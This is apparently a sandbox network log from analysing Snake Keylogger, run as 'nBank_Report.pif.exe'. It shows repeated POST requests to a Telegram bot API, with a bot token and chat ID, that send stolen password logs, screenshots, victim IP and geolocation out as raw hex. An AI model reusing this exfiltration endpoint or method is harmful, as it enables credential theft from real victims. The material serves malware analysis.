                                              Date: Thu, 26 Sep 2024 09:34:35 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.1049772149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:35 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce3bce5ba22ae
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:35 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 62 63 65 35 62 61 32 32 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce3bce5ba22aeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:36 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:36 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:36 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6355,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343276,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.1049773149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:37 UTC718OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce4192c390b17
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 31 39 32 63 33 39 30 62 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce4192c390b17Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:37 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:38 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:38 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.1049774149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:39 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce4bf04ed34f6
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:39 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 62 66 30 34 65 64 33 34 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce4bf04ed34f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:39 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:39 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:39 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6357,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343279,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.1049775149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:40 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce514a3c0d1e8
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 31 34 61 33 63 30 64 31 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce514a3c0d1e8Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
